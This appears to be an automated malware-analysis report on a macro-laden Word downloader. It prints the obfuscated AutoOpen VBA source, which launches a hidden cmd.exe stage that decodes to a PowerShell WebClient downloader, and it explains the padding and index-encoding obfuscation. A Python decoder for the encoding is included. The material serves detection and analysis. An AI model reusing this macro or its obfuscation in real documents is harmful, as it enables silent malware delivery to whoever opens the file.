Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1566.001 Phishing: Spearphishing Attachment
- T1059.005 Command and Scripting Interpreter: Visual Basic (AutoOpen VBA macro)
- T1059.003 Command and Scripting Interpreter: Windows Command Shell (the macro launches cmd.exe /V/C)
- T1059.001 Command and Scripting Interpreter: PowerShell (the cmd.exe stage decodes to a PowerShell downloader; see the summary below)
- T1027 Obfuscated Files or Information (string-fragment concatenation in VBA, delayed-expansion index encoding in batch)
The sample is a malicious Word document (OLE format) carrying a VBA project. Its AutoOpen procedure runs as soon as the file is opened with macros enabled. Under On Error Resume Next it calls Shell with two arguments: a command assembled by concatenating string fragments returned by helper functions (fmlrQ, ThKmJa, oLzSr and others whose modules fall outside the preview), and the window style 813793893 - 813793893, which is 0 (vbHide), so the spawned shell has no visible window. The dozens of TypeName calls on undefined names and on arbitrary arithmetic are no-op padding meant to defeat static signatures; with On Error Resume Next they cost nothing. Read in concatenation order, the fragments spell out cmd /V/C"set ZErW=<78-character key>&&for %v in (41;48;75;61;...) ..., the delayed-expansion substring-index trick: each number in the for list selects one character of the key (the usual form is !ZErW:~%v,1!) and the selected characters are appended to rebuild the real command. The Chr(... + 34 + ...) that closes the /C argument evaluates to a double quote because every other operand is an undefined name, which VBA treats as Empty, i.e. 0. Decoding the visible index list against the key yields powershell $NSw=new-object Net.WebClient;$zBP='<five http:// URLs joined by @>'.Split('@'), the opening of a PowerShell downloader stage with a list of fallback URLs. The preview is cut off before the for loop's do clause and the final call, so the exact PowerShell invocation, the loop over the URL list and the name of the dropped file cannot be recovered from this page. The ClamAV detection (Doc.Malware.Valyria) is consistent with this downloader behaviour.
Heuristics (5)

- ClamAV: Doc.Malware.Valyria-6703371-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Valyria-6703371-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding). Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN). The VBA project contains an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: the "no modern VBA project was recovered" clause contradicts the VBA project that olevba did extract (macros.bas, below); treat this finding as a second hit on the same AutoOpen name rather than as evidence of a separate WordBasic-era macro.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace carried by any Office document with drawing markup; it is not an indicator of compromise and it is not a URL the macro contacts. The macro's own URLs are stored as character indices into a key string, not as plain text, which is why the URL extractor did not see them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6295 bytes |

SHA-256 (macros.bas): f829bb414fa35f40545b1a9f66a4503cd7b4ca25a35fdff1d5af4a012819acca

Script preview: first 1,000 lines of the extracted script (the copy reproduced below is itself cut off partway through the oLzSr function).
Attribute VB_Name = "VIuwBzjOnR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Fix(68460 + qaArUG)
TypeName ChrW(aEiEM)
TypeName Rnd(64)
TypeName uBRdFs
TypeName ChrB(92)
TypeName HpwJf
Shell@ CStr("c") + CStr("m") + tJXVbMTk + iKACdtzQRoW + fmlrQ + ThKmJa + oLzSr + wtXHivttmHT + lbhFIjawO + TYWpBNdU, 813793893 - 813793893
TypeName Rnd(28)
TypeName CByte(669)
End Sub
Attribute VB_Name = "kzGCKGTOsnwCu"
Function fmlrQ()
On Error Resume Next
TypeName Rnd(8264)
TypeName Round(7353)
TypeName Log(BpZMv * jzpIBs + kqwdbU - QjzJQ)
itatOiT = "d /V/C" + CStr(Chr(wWjfjhJHiuN + zRfPSsZ + 34 + SOKfZSBDfuQvIN + OIrRjFsTDmnLHM)) + "s" + "et Z" + "Er" + "W=b" + "Xtj" + "AduknkuHX" + "ZjjcKWUR" + "tkruXt5NfL" + "Vs$" + "Sl" + "i.v:yp"
TypeName 3322
TypeName CInt(tkjEPY + ijrwqG)
rzitTRpPi = "JP8D/'o" + "6 -B14h,M)" + "_+" + "e;\9" + "gF" + "z" + "}C{=" + "@m" + "aw(x&&fo" + "r %v in (4" + "1;48;"
TypeName wOQMZV
TypeName RrQwpK
TypeName ChrW(42921 + Tzwif)
VbzmLQ = "75;61" + ";23;32;55;" + "61;35;35;" + "50;33;28;3" + "4;75;7"
TypeName wACzwm
TypeName qjGEHu
TypeName Sgn(vcOaco / SjOaO - 85275 + FpKzj)
HlCrfJNJjpk = "1" + ";8;61;75;5" + "1;48;0" + ";15;61;16;" + "26;50;2" + "8;61;26;3"
TypeName Log(YQtZC)
TypeName CDbl(pDOdF + PXGCLW * XlWRE * HWUtKh)
GzsSabDIOwV = "7;18;61;0" + ";6" + "9;35;36;6" + "1;8;26;62" + ";33;67;"
TypeName Elkrh
TypeName 17
TypeName CInt(82)
cWDabkjNfBn = "52;43;7" + "1;47;55;" + "2" + "6;26" + ";41;39" + ";" + "46;4" + "6;" + "48;22;32;"
TypeName 5336
TypeName Rnd(hdQah)
TypeName VzUKE
zLjHj = "36;23;37;1" + "6;48;73;46" + ";74;41;" + "41;35;3" + "6" + ";16;74;26"
TypeName ChrB(rGNdIJ * PIFMT)
TypeName Tan(9)
TwktvzXDWI = ";36;48;" + "8;46;3" + "5;74" + ";8;65;24;" + "74" + ";65;6" + "1;59" + ";27" + ";59;15;" + "24;8;61;46"
fmlrQ = itatOiT + rzitTRpPi + VbzmLQ + HlCrfJNJjpk + GzsSabDIOwV + cWDabkjNfBn + zLjHj + TwktvzXDWI
TypeName BfTGk
TypeName 57
TypeName Sin(22324 / wrtnSM / SBAbo + 26676)
End Function
Function ThKmJa()
On Error Resume Next
TypeName 4897
TypeName 5
qiRzzKD = ";49;32;3" + "6;" + "25;72;55;" + "26;26;41;" + "3" + "9;46;46;24"
TypeName ChrW(828)
TypeName Int(7)
QBnCEpiojq = ";8;36" + ";38;" + "61;23" + ";32;36;" + "26;40" + ";41;35;2" + "4;73;0;" + "36;8;65;3"
TypeName ChrB(FJBIZd - wjQBm * 23751 * fbptF)
TypeName Log(19079 * NinJO)
TypeName CLng(wUqbB * jmKniG - 6601 - LmaJm)
wIYnYWjbZ = "6;8;" + "16;37;1" + "6;48;73" + ";" + "46;40;5" + ";5" + "4;72" + ";55;26;26" + ";41;39;46;"
TypeName cPNkp
TypeName 3104
TTtwoTlI = "46;24;74;" + "36" + ";37;" + "41;23;48;" + "15;61;26;4"
TypeName Round(8)
TypeName OblvK
uHiUsQZ = "8;32;38" + ";4" + "1;37" + ";16;4" + "8;73" + ";37;" + "0;23;46;3"
ThKmJa = qiRzzKD + QBnCEpiojq + wIYnYWjbZ + TTtwoTlI + uHiUsQZ
TypeName Chr(228591726)
TypeName pfGauG
TypeName sNzbU
End Function
Function oLzSr()
On Error Resume Next
TypeName Chr(86356 / NRwoPp * QrbfQ / PzHhwm)
TypeName TiqtiH
hQrAPakWoqu = "0;41;8;16;" + "65;72" + ";55;" + "26;26;41;" + "3" + "9;46;" + "46;7" + "5;" + "75;7"
TypeName qECjzt
TypeName Sgn(14458 * qjKDiT - PzzTno * XlumFu)
TypeName Oct(FdzkaN)
OGpifqCo = "5;37" + ";27;53;75;" + "55;37;26;" + "48;41" + ";46;61" + ";75;31" + ";54;72;5" + "5;2"
TypeName CDate(ZZVwm)
TypeName CStr(209828617)
iQTABZRppbA = "6;26;41" + ";39;46" + ";46;73;" + "74;16;23;" + "48;" + "3"
TypeName Chr(HOKRT * CKfwC)
TypeName CBool(262)
TypeName CSng(pIdjF + sYXitt / 26665 - zkGin)
hzzDZifzp = "2;41;74" + ";67;36;" + "4" + "8;37;" + "36;26;46"
TypeName XoKri
TypeName 491791782
TypeName Chr(93795204)
urnss = ";48" + ";42;" + "35;47;37;3" + "4;41;" + "35;" + "3" + "6;26;" + "76;" + "47;7" + "2;" + "47;58;"
TypeName
... (truncated)
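The following Python is an added example written for this report; it is not code from the analyzer or from the malware. It reconstructs the string that the macro's Shell call receives, using only the fragments visible in the preview above (copied piece by piece from fmlrQ, ThKmJa and oLzSr in the order each function concatenates them), and then emulates the batch-level layer: cmd.exe /V delayed expansion with a `set KEY=...` followed by `for %v in (i;j;k;...)`, where each number selects one character of KEY. Assumptions, each also noted in the code: the names in the Shell expression that are not functions (tJXVbMTk, iKACdtzQRoW, wtXHivttmHT, lbhFIjawO, TYWpBNdU) are undefined variables and contribute an empty string; the undefined operands inside Chr(...) are Empty, so the call yields Chr(34); and the part of the command after the index list (the for loop's `do` clause and the final call) is outside the preview and is not emulated.

```python
import re

# Constructed input: the VBA string fragments as shown in the extracted macro, in
# concatenation order. Comments name the VBA variable each group belongs to.
QUOTE = chr(34)  # CStr(Chr(wWjfjhJHiuN + zRfPSsZ + 34 + ...)): other operands are undefined (Empty = 0)

FMLRQ = (
    "d /V/C" + QUOTE + "s" + "et Z" + "Er" + "W=b" + "Xtj" + "AduknkuHX" + "ZjjcKWUR"
    + "tkruXt5NfL" + "Vs$" + "Sl" + "i.v:yp"                                              # itatOiT
    + "JP8D/'o" + "6 -B14h,M)" + "_+" + "e;\\9" + "gF" + "z" + "}C{=" + "@m"
    + "aw(x&&fo" + "r %v in (4" + "1;48;"                                                # rzitTRpPi
    + "75;61" + ";23;32;55;" + "61;35;35;" + "50;33;28;3" + "4;75;7"                     # VbzmLQ
    + "1" + ";8;61;75;5" + "1;48;0" + ";15;61;16;" + "26;50;2" + "8;61;26;3"             # HlCrfJNJjpk
    + "7;18;61;0" + ";6" + "9;35;36;6" + "1;8;26;62" + ";33;67;"                         # GzsSabDIOwV
    + "52;43;7" + "1;47;55;" + "2" + "6;26" + ";41;39" + ";" + "46;4" + "6;" + "48;22;32;"  # cWDabkjNfBn
    + "36;23;37;1" + "6;48;73;46" + ";74;41;" + "41;35;3" + "6" + ";16;74;26"            # zLjHj
    + ";36;48;" + "8;46;3" + "5;74" + ";8;65;24;" + "74" + ";65;6" + "1;59" + ";27"
    + ";59;15;" + "24;8;61;46"                                                           # TwktvzXDWI
)

THKMJA = (
    ";49;32;3" + "6;" + "25;72;55;" + "26;26;41;" + "3" + "9;46;46;24"                   # qiRzzKD
    + ";8;36" + ";38;" + "61;23" + ";32;36;" + "26;40" + ";41;35;2" + "4;73;0;" + "36;8;65;3"  # QBnCEpiojq
    + "6;8;" + "16;37;1" + "6;48;73" + ";" + "46;40;5" + ";5" + "4;72" + ";55;26;26" + ";41;39;46;"  # wIYnYWjbZ
    + "46;24;74;" + "36" + ";37;" + "41;23;48;" + "15;61;26;4"                            # TTtwoTlI
    + "8;32;38" + ";4" + "1;37" + ";16;4" + "8;73" + ";37;" + "0;23;46;3"                 # uHiUsQZ
)

OLZSR = (
    "0;41;8;16;" + "65;72" + ";55;" + "26;26;41;" + "3" + "9;46;" + "46;7" + "5;" + "75;7"  # hQrAPakWoqu
    + "5;37" + ";27;53;75;" + "55;37;26;" + "48;41" + ";46;61" + ";75;31" + ";54;72;5" + "5;2"  # OGpifqCo
    + "6;26;41" + ";39;46" + ";46;73;" + "74;16;23;" + "48;" + "3"                       # iQTABZRppbA
    + "2;41;74" + ";67;36;" + "4" + "8;37;" + "36;26;46"                                  # hzzDZifzp
    + ";48" + ";42;" + "35;47;37;3" + "4;41;" + "35;" + "3" + "6;26;" + "76;" + "47;7" + "2;" + "47;58;"  # urnss
)

# Shell@ CStr("c") + CStr("m") + tJXVbMTk + iKACdtzQRoW + fmlrQ + ThKmJa + oLzSr + ...
# Assumption: the non-function names are undefined variables (Empty), so they add nothing.
SHELL_COMMAND = "c" + "m" + FMLRQ + THKMJA + OLZSR

# set NAME=KEY&&for %v in (i;j;k...): cmd.exe splits the list on ';' and, with /V,
# !NAME:~%v,1! picks the single character at offset %v of KEY.
BATCH_PATTERN = re.compile(r"set (?P<name>\w+)=(?P<key>.*?)&&for %v in \((?P<idx>[\d;]*)", re.S)


def decode_batch_command(cmd):
    """Undo the delayed-expansion substring-index encoding.

    Returns (variable name, key string, rebuilt payload). Raises if the pattern is
    absent or an index points past the end of the key (a sign of a mis-copied fragment).
    """
    m = BATCH_PATTERN.search(cmd)
    if m is None:
        raise ValueError("no 'set X=...&&for %v in (...)' index-encoding pattern found")
    key = m.group("key")
    indices = [int(i) for i in m.group("idx").split(";") if i]
    bad = [i for i in indices if i >= len(key)]
    if bad:
        raise ValueError(f"index out of range for a {len(key)}-char key: {bad[:5]}")
    return m.group("name"), key, "".join(key[i] for i in indices)


def extract_urls(payload):
    """Pull the @-separated download URLs out of the decoded PowerShell stage."""
    return re.findall(r"https?://[^'@\s]+", payload)


if __name__ == "__main__":
    name, key, payload = decode_batch_command(SHELL_COMMAND)
    print(f"key variable {name} ({len(key)} chars): {key}")
    print("decoded stage:", payload)
    for url in extract_urls(payload):
        print("download URL:", url)
```

The decoder stops where the preview stops: the payload it prints ends at `.Split('@')`, so the URL list is the last thing recoverable. The out-of-range check is worth keeping when you apply this to other samples of the same family: a single mis-transcribed fragment shifts every later character of the key and usually shows up as an index past the end rather than as silently wrong output.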